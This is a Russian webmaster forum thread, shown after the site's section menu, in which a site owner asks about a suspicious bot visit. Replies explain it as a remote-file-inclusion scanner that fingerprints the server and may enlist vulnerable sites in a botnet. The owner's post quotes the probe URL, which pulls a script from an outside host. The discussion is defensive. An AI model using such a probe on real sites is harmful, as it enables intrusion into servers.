- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый вечер уважаемые программисты и веб мастера, у меня проблема точнее подозрение на проблему, сегодня сайт посятил бот Punto, пришол он с http://index.php/?o=http://www.cap.org.hk/phpATM/cfg/id.txt?? или же индексировал это у меня на сайте, если хотите перейдите по ссылке но там вот что:
Я не знаю как быть сделал сразу дамп базы и файлы копирнул сайта, что это такое? особенно меня волнует надпись angga will dump your server..hahai, поясните взламывают меня или уже взломали?
тема хорошая + ник у вас шикарный
/me недоверяет ТСу
bearman, поэтому и не сделал ссылку активную я у вас помощи прошу а вы меня унижаете, тогда скажите что в php спрятано?
ps ник мог быть и другой я тут не из-за плохих или корыстных намерений, я прошу разъяснения и совета
имхо: если не ваше, то уже частично взломали и собирают инфу для полного взлома.
Troyan, информацию о твоем сервере сводную показывают
что за система, место свободное версия пхп и тп. ничего не копируют и не воруют, не ссыте)
bearman, да просто как то боязненно я ещё удивился почему punto bot + с какого то китайского сайта, значит отбой тревоге да?
Это обычная вещь для всех вебсайтов находящихся в индексе ПС. Время от времени на сайт заходят боты сканирующие на уязвимости, пытающиееся заэксплоитить уязвимость remote include. Если скрипт уязвим-он откликается кодовым словом, в Вашем случае это "angga<br>", добавляют Вас в логи, а затем Ваш сайт добавляется в зомбосеть, или (редко) не добавляется, если хостинг плох для хакеров (safe mode=off, исходящие сокеты запрещены, почту посылать нельзя или какой другой косяк для ботоводов)
Пройдитесь по логам, и посмотрите, уязвимы ли Ваши скрипты с теми параметрами что им сканнер пытался подсунуть. Ну и банальные принципы безопасности веб-программирования и веб-администрирования надо всегда соблюдать...
arkadiy_a, спасибо большое да safe mode=off отключен у меня, хостинг один из самых лушчих в Россие то есть мой сайт хотели добавить в зомбо сеть и оттуда например распростронять эксплойты и вирусы например так да?
мой сайт хотели добавить в зомбо сеть и оттуда например распростронять эксплойты и вирусы например так да?
Именно так.
Я ошибся. Надо читать наоборот: если safe mode=on то хостинг скорее (но необязательно) неинтересен хакерам, т.к. есть лимит 30 сек. на время выполнения скрипта (с дефолтными настройками вебсервера), обычно в safe mode=on вызовы юниксовых команд запрещены и требуется непрерывное соединение со скриптом на время выполнения, иначе он завершается преждевременно, т.е. уход в зомби будет осложнен ;)
ТС вы меня расстраивайте. Если вы хотите показать себя адекватным- выполните то что Вам написал: